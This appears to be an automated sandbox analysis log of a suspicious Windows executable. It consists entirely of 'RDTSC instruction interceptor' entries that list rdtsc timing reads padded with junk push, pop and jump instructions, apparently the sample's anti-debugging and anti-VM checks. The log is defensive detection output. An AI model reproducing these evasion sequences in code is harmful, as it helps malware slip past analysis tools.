Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6BAC second address: 14D6BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE3FC second address: 14DE406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8C6CC64786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE406 second address: 14DE40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E06D6 second address: 14E06E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE57E second address: 14DE582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E06E3 second address: 14E06E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE582 second address: 14DE59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F8C6D17D0ACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE59B second address: 14DE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E26D2 second address: 14E26D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E26D6 second address: 14E26DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521ABF second address: 1521AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnc 00007F8C6CC64786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AD2 second address: 1521ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521ADA second address: 1521AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AE0 second address: 1521AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C6D17D0A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521AED second address: 1521B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64796h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521B07 second address: 1521B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1521B0B second address: 1521B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1529851 second address: 1529855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1529855 second address: 1529859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527750 second address: 152775C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152775C second address: 1527761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527761 second address: 1527778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 je 00007F8C6D17D0A6h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527778 second address: 1527790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8C6CC64791h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278C8 second address: 15278D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C6D17D0A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278D4 second address: 15278DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15278DA second address: 15278DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D37 second address: 1527D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D3B second address: 1527D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1527D41 second address: 1527D4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C6CC6478Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528056 second address: 152805A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15289E6 second address: 1528A00 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C6CC64786h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8C6CC64786h 0x00000013 pop esi 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528A00 second address: 1528A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528A04 second address: 1528A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F4B second address: 1528F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F51 second address: 1528F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64799h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F70 second address: 1528F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1528F74 second address: 1528F7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294B9 second address: 15294CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F8C6D17D0A6h 0x0000000e jnp 00007F8C6D17D0A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294CD second address: 15294E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15294E0 second address: 15294E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152E26B second address: 152E26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D4F0 second address: 152D507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 jp 00007F8C6D17D0A6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D783 second address: 152D787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D787 second address: 152D7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C6D17D0B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D7A5 second address: 152D7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152D933 second address: 152D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152DFE8 second address: 152E02C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C6CC64788h 0x00000008 jmp 00007F8C6CC64798h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F8C6CC6478Eh 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007F8C6CC6478Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152FA41 second address: 152FA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B1h 0x00000007 jg 00007F8C6D17D0A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 152FA60 second address: 152FA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15343DE second address: 15343FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8C6D17D0AEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15343FB second address: 1534409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC6478Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1534409 second address: 153441C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6D17D0A6h 0x00000008 jc 00007F8C6D17D0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153441C second address: 1534426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1534426 second address: 153442C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153A87E second address: 153A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153ACCD second address: 153ACEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F8C6D17D0A6h 0x00000010 jmp 00007F8C6D17D0AEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153ACEB second address: 153ACF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AEC0 second address: 153AEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFE1 second address: 153AFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFEB second address: 153AFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153AFF4 second address: 153AFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B151 second address: 153B15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B15D second address: 153B169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8C6CC64786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 153B825 second address: 153B834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1539E3E second address: 1539E83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F8C6CC64790h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8C6CC6478Bh 0x00000017 pop eax 0x00000018 jnc 00007F8C6CC6479Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1543719 second address: 154371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154371E second address: 1543724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154331D second address: 154332A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F8C6D17D0B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 154332A second address: 1543330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525DE second address: 15525E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525E3 second address: 15525F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8C6CC6478Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15525F5 second address: 1552626 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F8C6D17D0ACh 0x00000012 push esi 0x00000013 jmp 00007F8C6D17D0B5h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 155533E second address: 1555367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C6CC6478Dh 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 155B2E0 second address: 155B2E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156358C second address: 15635A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C6CC64790h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156AF1B second address: 156AF21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156AF21 second address: 156AF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F8C6CC64792h 0x0000000e pop edx 0x0000000f jmp 00007F8C6CC64791h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 jl 00007F8C6CC64786h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B0FE second address: 156B107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B41F second address: 156B454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64796h 0x00000009 jmp 00007F8C6CC64799h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B86F second address: 156B87A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8C6D17D0A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B87A second address: 156B89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8C6CC64796h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156B89B second address: 156B8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 ja 00007F8C6D17D0A6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570257 second address: 157025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157025B second address: 1570265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570265 second address: 157026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157026B second address: 1570271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 1570271 second address: 157027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 157027B second address: 157027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDAA second address: 156FDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDB2 second address: 156FDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDB8 second address: 156FDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FDC1 second address: 156FDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF0C second address: 156FF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF10 second address: 156FF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF16 second address: 156FF32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C6CC6479Eh 0x00000008 jmp 00007F8C6CC64792h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF32 second address: 156FF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 jmp 00007F8C6D17D0B0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 156FF4C second address: 156FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8C6CC64798h 0x0000000a ja 00007F8C6CC64788h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jnp 00007F8C6CC6478Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
